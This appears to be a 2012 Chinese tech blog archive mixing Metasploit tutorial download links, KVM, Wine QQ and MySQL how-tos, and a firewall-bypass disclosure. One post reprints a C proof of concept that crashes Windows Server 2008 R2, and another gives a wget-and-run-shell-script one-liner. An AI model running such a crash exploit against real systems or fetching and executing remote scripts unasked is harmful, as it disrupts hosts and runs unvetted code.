Metasploit Framework 3系列视频教程全集批量下载(Linux520[Beach作品])

作者: 日期: 2012 年 5 月 1 日 评论关闭

不用过多介绍了吧。关于metasploit Framework网上有很多介绍。相信大家也看过linux520出品的这个系列教程:

http://www.linux520.com/viewthread.php?tid=212

课程列表如下:
===========================
|    Metasploit Framework Series Video    |
|                      ——by: beach                |
===========================
:::::::::::::::::::::::::::::::::::::::::::
[ .:. ]Introduction:
[01-]Whats the metasploit?
[02-]How to install MSF
[03-]Update and directory
:::::::::::::::::::::::::::::::::::::::::::
[ .:. ]User Interface:
Msfconsole interface:
[04-]Core commands
[05-]Exploits module
[06-]Payloads module
[07-]Attacking windows with MSF
[08-]Auxiliary,encoders,nops module
[09-]Msfcli interface
[10-]Msfweb interface
[11-]Msfd interface
[12-]Msfpayload and msfencode
:::::::::::::::::::::::::::::::::::::::::::
[ .:. ]Database support:
[13-]Database backend commands
[14-]db_autopwn
:::::::::::::::::::::::::::::::::::::::::::
[ .:. ]Advanced payloads:
[15-]Meterpreter payload
[16-]Vncinject payload
:::::::::::::::::::::::::::::::::::::::::::
[ .:. ]Others:
[17-]Fast-Track Autopwn
[18-]Auxiliary — Sqlmap
[19-]Fast-Track Sqlpwnage
[20-]Final video
:::::::::::::::::::::::::::::::::::::::::::

全集下载的列表如下(右键迅雷下载全部链接,挑选mp4与swf为后缀的文件就可以了)
http://www.linux520.com/v/l00020/video.mp4
http://www.linux520.com/v/l00006/l00006.swf
http://www.linux520.com/v/l00007/l00007.swf
http://www.linux520.com/v/l00027/l00027.swf
http://www.linux520.com/v/l00028/l00028.swf
http://www.linux520.com/v/l00031/l00031.swf
http://www.linux520.com/v/l00030/l00030.swf
http://www.linux520.com/v/l00033/l00033.swf
http://www.linux520.com/v/l00034/l00034.swf
http://www.linux520.com/v/l00037/l00037.swf
http://www.linux520.com/v/l00038/l00038.swf
http://www.linux520.com/v/l00046/l00046.swf
http://www.linux520.com/v/l00047/l00047.swf
http://www.linux520.com/v/l00070/l00070.swf
http://www.linux520.com/v/l00071/l00071.swf
http://www.linux520.com/v/l00072/l00072.swf
http://www.linux520.com/v/l00073/l00073.swf
http://www.linux520.com/v/l00076/fasttrack.mp4
http://www.linux520.com/v/l00077/auxiliary%20sqlmap.mp4
http://www.linux520.com/v/l00079/msf19.mp4
http://www.linux520.com/v/l00080/l00080.swf

这样下载下来以后,看着名字也不顺眼,于是我们想到了用BAT命令批量搞定命名问题.好了,下载了上面的文件之后,把他们都放到任意盘的一个任意目录里譬如是(D盘的一个叫123的文件夹里)
然后我们把下面的内容复制到记事本里,保存到D盘的123文件夹里,改名为”1.bat“

ren “auxiliary sqlmap.mp4″ “第十八集_Auxiliary sqlmap.mp4″
ren “fasttrack.mp4″ “第十七集_Fast-Track autopwn.mp4″
ren “l00006.swf” “第一集_Whats the metasploit.swf”
ren “l00007.swf” “第二集_how to install MSF.swf”
ren “l00027.swf” “第三集_update and directory.swf”
ren “l00028.swf” “第四集_core commands.swf”
ren “l00030.swf” “第六集_payloads module.swf”
ren “l00031.swf” “第五集_Exploits module.swf”
ren “l00033.swf” “第七集_Attacking windows with MSF.swf”
ren “l00034.swf” “第八集_auxiliary,encoders,nops.swf”
ren “l00037.swf” “第九集_Msfcli interface.swf”
ren “l00038.swf” “第十集_msfweb interface.swf”
ren “l00046.swf” “第十一集_msfd interface.swf”
ren “l00047.swf” “第十二集_msfpayload and msfencode.swf”
ren “l00070.swf” “第十三集_database backend commands.swf”
ren “l00071.swf” “第十四集_db_autopwn.swf”
ren “l00072.swf” “第十五集_Meterpreter payload.swf”
ren “l00073.swf” “第十六集_vncinject payload.swf”
ren “l00080.swf” “第二十集_Final video.swf”
ren “msf19.mp4″ “第十九集_Fast-Track sqlpwnage.mp4″
ren “video.mp4″ “简介_Introduction.mp4″

然后双击1.bat即可

 

 

http://zone.rootkit.us/metasploit/简介_Introduction.mp4

第01集_Whats the metasploit.swf

第02集_how to install MSF.swf

第03集_update and directory.swf

第04集_core commands.swf

第05集_Exploits module.swf

第06集_payloads module.swf

第07集_Attacking windows with MSF.swf

第08集_auxiliary,encoders,nops.swf

第09集_Msfcli interface.swf

第10集_msfweb interface.swf

第11集_msfd interface.swf

第12集_msfpayload and msfencode.swf

第13集_database backend commands.swf

第14集_db_autopwn.swf

第15集_Meterpreter payload.swf

第16集_vncinject payload.swf

第17集_Fast-Track autopwn.mp4

第18集_Auxiliary sqlmap.mp4

第19集_Fast-Track sqlpwnage.mp4

第20集_Final video.swf

置顶文章! 继续阅读?

metasploit相关参考站点、论坛

作者: 日期: 2012 年 5 月 1 日 评论关闭

metasploit相关参考站点

http://www.offensive-security.com/metasploit-unleashed/

metasploit网上的教程

http://www.rapid7.com/products/metasploit-express/

metasploit商业化产品的站点

http://www.ethicalhacker.net/content/view/29/24/

metasploit Tutorial

http://www.milsec.net/viewforum.php?id=10

一个国内讨论metasploit应用的站点

http://www.metasploit.com/modules/

metasploit module

http://www.pcsec.org/catalog.asp?tags=Metasploit

一些文章

http://www.corelan.be:8800/index.php/20 … 2/exploit-

writing-tutorials-part-4-from-exploit-to-metasploit-the-basics/
module design tutorials

http://www.ipodtouchfans.com/forums/sho … hp?t=29487
Metasploit on itouch

http://pda.portability.nl/internet-tabl … ablet.html
Make Metasploit Mobile

http://talk.maemo.org/showthread.php?t=53199

video of the N900 hacking a Windows XP machine by using Metasploit

http://seclists.org/metasploit/2007/q1/109

Metasploit on PDA

http://www.governmentsecurity.org/forum … opic=19163

Metasploit mobile edition

置顶文章! 继续阅读?

ubuntu下kvm的简单使用

作者: 日期: 2012 年 5 月 12 日 没有评论
听讲XEN很快就要从LINUX内核中去掉,redhat和Ubuntu也大力的在推广KVM,所以在Ubuntu下整了一下KVM,相当容易使用,基本比Vmware还要容易,但性能好上很多倍,因为他是半虚拟的,很大程序上可以直接使用真实的硬件.

RedHat 红帽CTO Brian Steven在一次记者招待会说:“我们致力于Xen,RHEL 5有10年的生命周期,因此会有一个较大的交叉过渡。我们将在Red Hat 6中全面使用KVM,但KVM目前已经准备就绪,完全可以正式投入到数据中心和云中,不用再等待了!”

KVM要使用2.6.20以上的内核才行.Ubuntu到是不用担心,它基本一直使用的是最新的内核.

需要关心一点就是,你的硬件,CPU是不是支持半虚拟(VT/AMD-V),使用下面的命令可以查看是否支持

grep -E '(vmx|svm)'   /proc/cpuinfo

  在ubuntu中安装KVM

我原来以为KVM很难装,没想到现在容易成这样了.太方便了

sudo apt-get install kvm libvirt-bin ubuntu-vm-builder  bridge-utils kvm-pxe uml-utilities

安装KVM在ubuntu中的GUI管理软件,象我,拿ubuntu当桌面,就不使用命令…呵呵

sudo apt-get install virt-manager virt-viewer

需要设置一下网桥

sudo /etc/init.d/networking stop

我们来修改一下配置

sudo vim /etc/network/interfaces

静态IP和使用DHCP是不一样的,DHCP修改成下面这样

auto br0
iface br0 inet dhcp
bridge_ports eth0
bridge_stp off
bridge_fd 5
bridge_maxwait 5


static:

auto br0
iface br0 inet static
address 192.168.0.xxx
network 192.168.0.0
netmask 255.255.255.0
broadcast 192.168.0.255
gateway 192.168.0.1
bridge_ports eth0
bridge_stp off
bridge_fd 5
bridge_maxwait 5

完事后
进入ubuntu的“应用程序”-> “系统工具” -> “虚拟系统管理”就可以全GUI来玩kvm啦

 

RedHat Centos 安装 KVM

在 Centos 中安装 kvm 也一样很容易,

1. 安装 KVM 和 virtinst (一个创建 virtual machines 的工具 )

yum install kvm kmod-kvm qemu libvirt python-virtinst

 

2. 装完后记的重起,重起后检查模块是否有加载

$ lsmod | grep kvm
kvm_amd                50452  0
kvm                   109264  1 kvm_amd

也可以使用 virsh 来测试

virsh -c qemu:///system list

 

3. 安装桥接管理的工具

yum install bridge-utils

 

4. 安装 GUI 的管理软件

yum install virt-manager

 

KVM 的高级管理

KVM 现在相当成熟,在三个比较常用管理程序(我所知道的),大家平时玩玩的话,就用 GUI 来管理就好了,GUI 都会我就不详细写了:
virt-manager: 这个我最常用,是 GUI 的,需要 x windows 的支持。这个是 RedHat 开发,大家想了解可以到  http://virt- manager.et.redhat.com/ 上看看
virt-install:python 写的文字介面的管理 kvm 的程序,这个也是Red Hat 开发的哦。
ubuntu-vm-builder:这个是 Canonical (Ubuntu)开发的文字的管理程序。

 

virt-install 的基本使用

(1. 安装 virt-install 和 图形化的连接软件 virt-viewer

 

sudo apt-get install python-virtinst virt-viewer

详细使用可以 man virt-install

(2. virt-install 安装虚拟系统

例:

virt-install \
--connect qemu:///system \
--name= 虚拟机器的名字 \
--ram=设置内存的大小 [MB] \
--os-type=操作系统的类型 [linux ] \
--os-variant=操作系统的版本 [centos 5.4] \
--hvm [全虚拟化( hvm )与半虚拟化( paravirt  )选择其一] \
--paravirt  [全虚拟化( hvm )与半虚拟化( paravirt  )选择其一] \
--accelerate  [KVM 加速器] \
--cdrom=系统安装的CD路径 [*.iso] \
--file=虚拟硬盘的路径 [*.qcow2] \
--file-size=虚拟硬盘的大小 [GB] \
--bridge=br0 \
--vnc \
--noautoconsole  \
--debug

注意 Windows 只能用有全虚拟化( hvm )与半虚拟化( paravirt  )中选择 hvm.hvm 的意思是指硬件辅助的虚拟化,就是需要所谓的 VT 支持的。

建出来的虚拟机会在 /etc/libvirt/qemu/虚拟机器名称.xml 有个配置文件

(3. 使用 virt-install  启动虚拟的机器

进入 virsh 中,所有 virsh 的操作都要先进入这个

$virsh

 

管理启动

virsh# start 虚拟机器名字
virsh# list  --all
virsh# quit

 

(4. 安装管理查看 virt-install 安装后的系统是否正常

virt-viewer --connect qemu+ssh://帐号@虚拟机实体主机IP    要连接的虚拟机器名字

 

virt-install 的其它使用

在原来的基础上复制一个新的虚拟机器

virt-clone  --connect=qemu:///system \
-o 旧的虚拟机器名称  -n 新的虚拟机器名称  -f  新的虚拟硬碟路径 [*.qcow2]

查看所有虚拟出的机器

virsh# list --all

dump 虚拟出的机器配置文件

virsh# dumpxml 虚拟出的机器名称  /tmp/虚拟出的机器配置文件 [*.xml]

使用现有的虚拟出的机器配置文件建立虚拟新机器

virsh# define  /etc/libvirt/qemu/虚拟出的机器配置文件 [*.xml]

移除虚拟出的机器

virsh# undefine 虚拟出的机器名称

关闭虚拟出的机器

virsh# shutdown 虚拟出的机器名称

关掉虚拟出的机器的电源

virsh# destory 虚拟出的机器名称

 

KVM的小技巧

1.提升KVM的网络和硬盘IO在linux中的性能
官 方提供了一个叫kvm-guest-drivers-windows的网卡驱动很不错,虚拟机的启动参数那里加上model=virtio这个参数,界面 中也是可以设置的.硬盘也有virtio的驱动,记的使用.在Virt-manager 中可以选择 virtio disk.获得高性能的网络和磁盘操作
virtio的网卡驱动的地址: http://sourceforge.net/project/showfiles.php?group_id=180599&package_id=267943
virtio的硬盘驱动的地址:http://www.linux-kvm.com/sites/default/files/viostor.iso

2.和真实机器中资料共享
这个是超级方便的,不需要象VBox搞个文件夹,只要在Host的设置中直接给真实的Dev的块设备直接设定到Guest的配置中,然后在进入kvm中的系统,直接mount就行

3.转换VMWare的image让KVM能使用
我们先要安装一个小软件virt-goodies.

sudo apt-get install virt-goodies

然后使用vmware2libvirt来给VMWare VM的基本资料vmx转成KVM可以读入的XML. 如

vmware2libvirt -f myvm.vmx > myvm.xml

在转VMWare VM的disk image, 使用qemu-img转成KVM能读的文件.

qemu-img convert -f vmdk myvm.vmdk -O qcow2 myvm.qcow2

可能还需要修改一下vmx转成的xml,

disk中的target dev,在VMWARE是ide(target dev=’hda’ bus=’ide’)可能要修改成scsi(target dev=’sda’ bus=’scsi’),我们看能不能找到ROOT就知道是不是用对了;
bridge mode, 给interface type=’network’修改成interface type=’bridge’, 而source network=’default’修改成source bridge=’br0′.

qcow选项,则会创建QCOW(写时复制)格式
修改后给VM的配置加入到libvirtd中.

virsh -c qemu:///system define myvm.xml
virsh -c qemu:///system list --all

FAQ:
1.如果在安装的时候见到”FATAL: Error inserting kvm_intel”
这是因为没有在BIOS中打开virtualization.需要进入BIOS中打开,然后断电重起.进入系统后打modprobe kvm-intel来加载模块

先在虚拟机中打开windows自己的远程桌面,然后给用户设定密码,然后运行 rundll32 netplwiz.dll,UsersRunDll 启 用windows的自动登录。(这三步必不可少,否则rdesktop是无法连上winxp的)
重新启动虚拟机,当听到winxp后台登录的声音后,即可用rdesktop远程登录:

rdesktop localhost:3389 -u *** -p *** -g 1280×700 -r sound:local

 

-u winxp的用户名, -p winxp的密码, -r sound:local  启用声音

现在可以看到桌面了吧。是不是灰常流畅呢?鼠标、键盘 都非常完美啊,剪贴板也可以公用哦。堪比装了tools的virtualbox,但是比后者占用的资源要少的多。

让Ubuntu的32位系统支持超过4G的内存

作者: 日期: 2012 年 5 月 12 日 没有评论

代码如下:

1
2
sudo apt-get install linux-image-server #安装PAE内核支持
sudo apt-get install linux-headers-3.0.0-15-generic-pae #安装一些可能需要内核支持编译的东西

然后重启,搞定。
在terminal使用

1
free -m

查看总内存是否超过4G即可。

dis9

作者: 日期: 2012 年 5 月 12 日 没有评论

http://brk.dis9.com/?s=metasploit

 http://brk.dis9.com/category/videos-demo

wine qq 2012 for linux Ubuntu 64位兼容

作者: 日期: 2012 年 5 月 11 日 没有评论

+———————————————————————–+
| wine qq 2012 for linux Ubuntu 64位兼容
+———————————————————————–+
| 作者:LongeneTeam
| 网名:smile,timeboy,wolfstar
| QQ群:116095874 【Longene爱好者群】
| 新浪微博:http://www.weibo.com/longene
| Email:zhangcheng@insigma.com.cn
+———————————————————————–+
| 文章版权归原作者所有。
| 大家可以自由转载这篇文章,但原版权信息必须保留。
| 未经许可不得用于商业用途,任何个人、媒体、其他
| 网站不得私自抄袭。 如需用于商业用途,请务必与原
| 作者联系,若因未取得授权而收起的版权争议,由侵
| 权者自行负责。
+———————————————————————–+

本文链接:http://www.longene.org/forum/viewtopic.php?f=6&t=4700

目录:
1. wine-qq2012最新下载
2. 安装说明
3. 常见问题
4. 更新日志
5. 历史版本下载
6. 运行截图

+———————————————————————–+
wine qq2012 for linux 最新下载
+———————————————————————–+

http://www.longene.org/download/wine-qq2012-for-linux_20120302_ByLongeneTeam.deb

MD5:9a34af7f4d916ba630c1572b066a74d0
SHA1:d71af4d699db3e8433838b85d39a9e26bea946c0

网盘链接:
wine-qq2012-for-linux_20120302_ByLongeneTeam.1:http://dl.dbank.com/c0j13ihygp
wine-qq2012-for-linux_20120302_ByLongeneTeam.2:http://dl.dbank.com/c0uewkfmjd
下好之后这样合并: cat 包1 包2 >wine-qq2012-for-linux_20120302_ByLongeneTeam.deb

下载后请根据自己的机器类型,按照下面的32位或64位安装说明安装

新版本更新说明:
1.qq版本升级到官方最新qq2012Beta1
2.点击密码框不会崩溃
3.不会自动离线
4.支持全局热键(比如:Ctrl+Alt+A截图)
5.语音视频接受正常,本地视频无法使用
6.文件传输大小正常

已知问题:
1.窗口放到桌面边缘无法自动隐藏。
2.如果qq2012使用时发现没有声音或者遇到接收消息时qq僵死的情况,请手动安装更高版本的alsa-lib.(见常见问题一)
3.使用linux的显示桌面,或者使用Ctrl+Alt+z快捷键后切换了桌面的话,可能会导致qq面板无法唤出。
这时可以右键点击任务栏qq图标,选择锁定qq,就可以唤出主面板了。
4.关闭qq窗口可能会有残影,不过不影响使用。
+———————————————————————–+
安装说明:
+———————————————————————–+
32位系统安装说明:
1.如果之前安装过旧版本需要先卸载(通过dpkg -l | grep qq查看)。
2.安装: sudo dpkg -i 软件名.deb
卸载: 先dpkg -l | grep qq 找到名字,然后执行:sudo dpkg -r qq-for-wine 或 sudo dpkg -P qq-for-wine
3.安装后qq在桌面上方的Applications/Internet/qq2012,点击运行即可。也可以自己拖到桌面双击运行
或者 到/opt/qq2012/wineapp/qq目录下运行qq.sh
4.安装后在你的 $HOME下会生成.qq2012目录,这是qq程序的目录。/opt目录下有个qq2012目录这是wine的工作目录。
5.安装后第一次运行qq登录的时候可能有点慢这是正常的,qq要生成自己的一些用户信息

64位系统安装说明:
我们本想制作64位的deb安装包的,但是发现QQ并没有发行64位的版本,所以没法制作。
但经测试发现,在64位系统上安装ia32-libs后(Ubuntu执行:sudo apt-get install ia32-libs),
安装上面的32位包可以正常运行起来。

+———————————————————————–+
常见问题
+———————————————————————–+
一.如果qq使用时发现没有声音或者遇到接收消息时qq僵死的情况,按照下面安装高版本的slsa。
由于wine-1.4-rc2需要高版本的alsa-lib(>=1.0.22)版本,而Ubuntu自带的alsa-lib库版本太低,导致使用音频时可能会出现问
题。
安装步骤:
1. 下载源码:
你可以去官网ftp://ftp.alsa-project.org/pub/lib/ 下载源码,下载高于1.0.22版本的alsa-lib。
注意:我们只测试过alsa-lib-1.0.24.1的版本,能正常运行(ftp://ftp.alsa-project.org/pub/lib/alsa-lib-1.0.24.1.tar.bz2
)。 其他版本未作测试。
2.然后解压
tar -jxvf alsa-lib-1.0.24.1.tar.bz2
3.最后编译安装:
cd alsa-lib-1.0.24.1
./configure
make && make install

如果觉得麻烦,那可以试试我们已经编译好的alsa-lib。
下载:http://www.longene.org/download/alsa-lib-1.0.24.1.tar.bz2
安装方法很简单:
解压(tar -jxvf alsa-lib-1.0.24.1.tar.bz2),然后cd到解压开的文件夹,然后运行命令make install
由于桌面环境不一样,我们编译好的alsa-lib不一定所有机器都能用,如果不行请参考上面的方法去官网下载源码手动安装。

二.如果菜单无法前台显示,去掉qq设置 ‘始终保持在其他窗口前端’ 前面的勾。

三.如果QQ无法使用ibus中文输入法,按修改下面文件后重启。
1).在/etc/profile文件最后添加
XMODIFIERS=”@im=ibus”
XIM=”ibus”
GTK_IM_MODULE=”xim”
QT_IM_MODULE=”xim”
ibus-daemon -d -x
2).把/etc/X11/xinit/xinput.d/ibus文件中的 XIM_ARGS=”–xim” 改成 XIM_ARGS=”-d -x”

+———————————————————————–+
更新日志
+———————————————————————–+
2012-03-02 LATEST:
1.qq版本升级到官方最新qq2012Beta1
2.点击密码框不会崩溃
3.不会自动离线
4.支持全局热键(比如:Ctrl+Alt+A截图)
5.语音视频接受正常,本地视频无法使用
6.文件传输大小正常

已知问题:
1.窗口放到桌面边缘无法自动隐藏。
2.如果qq2012使用时发现没有声音或者遇到接收消息时qq僵死的情况,请手动安装更高版本的alsa-lib.(见常见问题一)
3.使用linux的显示桌面,或者使用Ctrl+Alt+z快捷键后切换了桌面的话,可能会导致qq面板无法唤出。
这时可以右键点击任务栏qq图标,选择锁定qq,就可以唤出主面板了。
4.关闭qq窗口可能会有残影,不过不影响使用。

2012-02-20:
1.qq版本升级到qq2011(官方最新qq2011正式版2012-01-31版),wine版本升级到wine-1.4-rc2
2.不会自动离线
3.支持全局热键(比如:Ctrl+Alt+A截图)
4.支持语音视频功能
5.文件传输大小正常(上一版本只可以传400K)
6.输入密码时,点击密码框不会崩溃

已知问题:
1.窗口放到桌面边缘无法自动隐藏。
2.如果qq2011使用时发现没有声音或者遇到接收消息时qq僵死的情况,请手动安装更高版本的alsa-lib。
(见常见问题一)
3.使用Ctrl+Alt+z快捷键之后,如果切换了桌面的话,可能会导致qq面板没法显示。这时可以右键点击任务栏qq
图标,选择锁定qq,就可以唤出主面板了。
4.关闭qq窗口可能会有残影,不过不影响使用。
5.无法更改外观,要换皮肤可以通过qq设置->换肤

2012-02-01更新:
1.消息记录基本完美:除了qq自带表情无法显示,其他均正常。
2.wine的工作目录改放在/opt目录下,这样就和已安装的其他版本的wine之间没有干扰。

待解决:
.ibus输入法切换时可能会崩溃,用fcitx输入法正常
.qq窗口放到桌面边缘无法自动隐藏
.qq安装更新出错
.音视频聊天会崩溃

2012-01-13更新:
1.解决qq在线状态自动变成离开状态
2.解决qq无法使用快捷键,现在可以使用qq快捷键了(像 Ctrl+Alt+A截图)

待解决:
.点击qq消息记录窗口时好时坏
.qq安装更新出错
.qq窗口放到桌面边缘无法自动隐藏

2011-05-10更新:
1.解决聊天窗口中对方中文名称是“口口口”问题
2.解决qq状态下拉菜单,主菜单无法前台显示
3.解决双击自己的头像,弹出窗口会崩溃的问题
4.修改脚本添加qq到 Applications/Internet/Tencent QQ[感谢Ivenvd网友的脚本]

待解决:
.点击qq消息记录窗口有时会崩溃
.在线状态自动变成离开状态
.无法使用快捷键
.qq安装更新出错

2011-04-25更新:
1.解决qq下拉菜单窗口无法显示
2.解决qq右键菜单窗口无法显示
3.解决qq空间微博点击没有反应,无法打开网页
4.解决qq退出出错

待解决:
1.qq状态下拉菜单,主菜单无法前台显示
2.qq消息记录窗口无法正常显示
3.qq连接视频后,出现不稳定
4.qq安装更新文件出错

2011-04-14更新:
1.解决qq截图黑屏问题
2.不需要备份$HOME目录下的已有的.wine,而是有与之相关的.qq
3.解决无法创建快捷方式到桌面

待解决:
1.qq下拉菜单窗口无法显示
2.qq右键菜单窗口无法显示
3.qq空间微博点击没有反应,无法打开网页
4.qq连接视频后,出现不稳定
5.qq安装更新文件出错
6.qq退出出错
+———————————————————————–+
历史版本下载:
+———————————————————————–+

http://www.longene.org/download/qq2011-for-wine_20120220.deb

MD5:7a085b561ddb226f478819bfcab4ba92
SHA1:71163c685f646a2e701e2528cd0fdef6e471bd06

网盘链接:
qq-for-wine_20120220.deb.1 :http://dl.dbank.com/c08xftalaa
qq-for-wine_20120220.deb.2 :http://dl.dbank.com/c0vnbhdiac
下好之后这样合并: cat qq-for-wine_20120220.deb.1 qq-for-wine_20120220.deb.2 >qq2011-for-wine_20120220.deb

http://www.longene.org/download/qq-for-wine_20120201.deb

MD5:4d047572aad797bbf6bb1ff95f909780
SHA1:0d068b5f9674d430c93f4fc6fb3cba1b3f56aea9
网盘下载:http://dl.dbank.com/c0jm5ormte

http://www.longene.org/download/qq-for-wine_20120113.deb

MD5:8770de8e7ab8a3473e9dc40401e15669
SHA1:18be666fa6913cc99464799709d95abbda4b99cd
网盘下载地址:http://dl.dbank.com/c0xl1mfrv9

http://www.longene.org/download/qq-for-wine_20110510.deb

MD5:fd71ce314ba480b6b2144bf16af5b6d1
SHA1:59677588625fe72df1332e61ee08b72f80668c59

http://www.longene.org/download/qq-for-wine_20110425.deb

MD5:23a4e14d70d7808a3766a87b6399eb32
SHA1:380a1b477e8cf3c360ff666e7145e6400e3e3700

http://www.longene.org/download/qq-for-wine_20110414.deb

MD5:5078b1ce30df3c03d0d5e6517289f5c9
SHA1:536a18169d7b846ef2598b74e6671e04bd5436b3

MS12-032 – Vulnerability in TCP/IP Could Allow Elevation of Privilege

作者: 日期: 2012 年 5 月 10 日 评论关闭

MS12-032 – Vulnerability in TCP/IP Could Allow Elevation of Privilege

Microsoft update release http://technet.microsoft.com/en-us/security/bulletin/ms12-032

Possible MS12-032 Proof of concept from StackOverflow thx to @avivra

We discovered that running our application under certain conditions results in Windows bluescreen. After some investigation we were able to narrow down the scenario to a sample of ~50 lines of C code using Winsock2 APIs. The sample repeatedly binds to IPv6-mapped invalid IPv4 address. Windows Server 2008 R2 crashes after several seconds running the sample. The problem reproduces on different physical machines as well as on Virtual Machines.

// the program attempts to bind to IPV6-mapped IPV4 address
// in a tight loop. If the address is not configured on the machine
// running the program crashes Windows Server 2008 R2 (if program is 32-bit)

#include
#include
#include
#include

#define IPV6_V6ONLY 27

void MyWsaStartup()
{
WORD wVersionRequested;
WSADATA wsaData;
int err;

wVersionRequested = MAKEWORD(2, 2);

err = WSAStartup(wVersionRequested, &wsaData);
if (err != 0) {
printf(“WSAStartup failed with error: %d\n”, err);
exit(-1);
}
}

void main()
{
MyWsaStartup();
bool bindSuccess = false;

while(!bindSuccess)
{
SOCKET sock = WSASocket(AF_INET6,
SOCK_DGRAM,
IPPROTO_UDP,
NULL,
0,
WSA_FLAG_OVERLAPPED);
if(sock == INVALID_SOCKET)
{
printf(“WSASocket failed\n”);
exit(-1);
}

DWORD val = 0;
if (setsockopt(sock,
IPPROTO_IPV6,
IPV6_V6ONLY,
(const char*)&val,
sizeof(val)) != 0)
{
printf(“setsockopt failed\n”);
closesocket(sock);
exit(-1);
}

sockaddr_in6 sockAddr;
memset(&sockAddr, 0, sizeof(sockAddr));
sockAddr.sin6_family = AF_INET6;
sockAddr.sin6_port = htons(5060);

// set address to IPV6-mapped 169.13.13.13 (not configured on the local machine)
// that is [::FFFF:169.13.13.13]
sockAddr.sin6_addr.u.Byte[15] = 13;
sockAddr.sin6_addr.u.Byte[14] = 13;
sockAddr.sin6_addr.u.Byte[13] = 13;
sockAddr.sin6_addr.u.Byte[12] = 169;
sockAddr.sin6_addr.u.Byte[11] = 0xFF;
sockAddr.sin6_addr.u.Byte[10] = 0xFF;

int size = 28; // 28 is sizeof(sockaddr_in6)

int nRet = bind(sock, (sockaddr*)&sockAddr, size);
if(nRet == SOCKET_ERROR)
{
closesocket(sock);
Sleep(100);
}
else
{
bindSuccess = true;
printf(“bind succeeded\n”);
closesocket(sock);
}
}
}

Windows Firewall Bypass Vulnerability and NetBIOS NS

作者: 日期: 2012 年 5 月 10 日 评论关闭

One of the attacks I always perform when doing internal penetration tests is NetBIOS Name Spoofing. NetBIOS has been a golden mine for penetration testers for years – many good articles about how to use NBNS spoofing have been written, and Metasploit comes with a module that allows you to easily abuse NBNS in order to collect LM and NT hashes from victim machines (of course, depending if LANMAN has been disabled or not).

I wrote a diary about this back in January so if you want to see details on how to abuse this I’d suggest that you readhttp://isc.sans.edu/diary.html?storyid=12454 first.

However, attacking clients, retrieving their LM/NT hashes and cracking them, as fun as it is, is only half of the job a penetration tester has to do. Besides capturing the flag, the report you produce must also include recommendations on how to mitigate the detected vulnerability otherwise it is really useless for your client (no matter how cool it is for us penetration testers to pwn something).

So after seeing NBNS being abused in many internal penetration tests (all?) I started checking what potential security controls we have at our disposal to prevent such attacks, or at least to make them less effective.

Obviously, the best way to prevent NBNS spoofing attacks is to completely disable NetBIOS name resolution. However, this maybe be easier said than done – from the diary I posted before (link above) it appears that there are many other services that still depend on NBNS.

Since Windows operating systems now come with a firewall (“Windows firewall” with Windows XP SP2 and “Windows Firewall with Advanced Security” with Vista and newer OSes) that can have multiple policies, depending on the current location of the machine (home, work or public networks), this sounded like a perfect idea for preventing NBNS attacks. In this scenario, an administrator that controls client machines through group policies could allow NBNS in home and work networks and disable it completely in public networks. While not perfect, this still offers a certain (and I’d say decent) amount of protection.

However, while testing this I noticed that the Windows firewall has a nasty bypass vulnerability (the now patched CVE-2012-0174 vulnerability).

In order to test it I turned on both inbound and outbound firewalls – remember that the Windows built-in firewall does not stop outbound connections by default:

Windows Firewall profile settings

Besides this, NBNS rules had to be disabled manually, in order to prevent NB-Name-Out network traffic. By stopping this traffic we would make sure that an attacker cannot abuse NBNS spoofing attacks, since the built-in firewall would stop all such outgoing requests. You can see the rules, with their respective profiles in the following picture:

Windows Firewall settings

After setting this, I expected that my NBNS spoofing attacks will fail. However, that did not happen – the attacks were still successful, and I was able to see NBNS queries on my local network. After setting up logging in the Windows firewall as well, I confirmed that Windows was happily letting this traffic leave, despite all the rules that have been set above:

2012-01-29 11:07:21 ALLOW UDP 192.168.161.137 192.168.161.255 137 137 0 – - – - – - – SEND

This log shows a NBNS query destined to the local network’s broadcast address.

The issue here is pretty clear – this means that an organization’s administrator who set such rules to protect his clients when they leave the organization’s network cannot rely on the built-in Windows firewall!

And, if you take a look at the attack scenarios I mentioned in the first diary, this can be particularly nasty for browsers configured in organizations. For example, a lot of organizations configure browsers on client machines to automatically open intranet portals, which are typically hosted on machines with names “intranet”, “portal” or similar.

When a user with such a machine connects to an open wireless network and opens a browser, the browser will first try to resolve such a name via DNS. When that fails, the machine will try to resolve this name via NBNS and this is where an attacker can fake the response and start collecting LM/NT hashes.

Another very nasty scenario includes machines looking for WPAD (Web Proxy Auto-Discovery). By spoofing this request, an attacker can “push” his own machine as the web proxy and the client’s web browser will happily use it, allowing the attacker to analyze network traffic and at least try to launch Man-in-the-Middle attacks (hopefully, we’ve trained our users not to click on certificate warnings, right?).

So, I got in touch with Microsoft and the MSRC guys verified that this is indeed an issue with the firewall. The conversations with the MSRC guys were great and, as you can see, the patch has been released that fixes this vulnerability.

As with other security patches, you should definitely install it as part of your monthly patch install cycles. The whole exercise also shows how one should always test security controls that you put in place – just the fact that you added a rule to block certain network traffic does not have to mean that the traffic is really blocked.
More information and the patch is available at the Microsoft’s web site: http://technet.microsoft.com/en-us/security/bulletin/ms12-032

Advisory details at http://www.infigo.hr/en/in_focus/advisories/INFIGO-2012-05-01

一行命令安装virtualmin面板

作者: 日期: 2012 年 5 月 5 日 没有评论

wget http://www.CTOHome.com/linux-vps-pack/virtualmin.sh;sh ./virtualmin.sh;

安装的最后,会自动安装zend optimizer,一路回车即可。完成后,进入 https://your-ip:10000/ ,用户名root,密码就是您服务器的root密码。

Mysql修改设置root密码的命令及方法

作者: 日期: 2012 年 5 月 5 日 评论关闭

Mysql数据库是PHP网站开发必不可少的组合,通常PHP连接 Mysql都是通过root用户名和密码连接,Mysql在安装时root初始默认密码为空,在安装使用PHP开源系统时,都需要填写连接Mysql数据 库的用户名和密码,此时当你忘记了Mysql的root密码或没有设置Mysql的root密码时,就必须要修改或设置Mysql的root密码,这个问 题对于PHP入门学习者来说也是个头大的问题,其实修改Mysql的root密码有很多方法,可以利用Mysql工具,也可以使用Mysql更改root 密码的命令来实现。

准备工作

在使用Mysql相关工具或Mysql命令来修改root密码之前请确保你已启动了Mysql服务,如果没有启动Mysql服务,请在DOS模式下输入

1
net start mysql

即可。

Mysql修改root密码的常用工具

使用phpmyadmin来更改root密码 如何安装配置phpmyadmin?

使用phpmyadmin来更改Mysql的root密码非常方便,安装配置好phpmyadmin后,首先登陆管理界面,点击右侧修改密码链接,输入你要修改的Mysql的root新密码,最后点击执行即可

使用phpmyadmin修改mysql的root密码

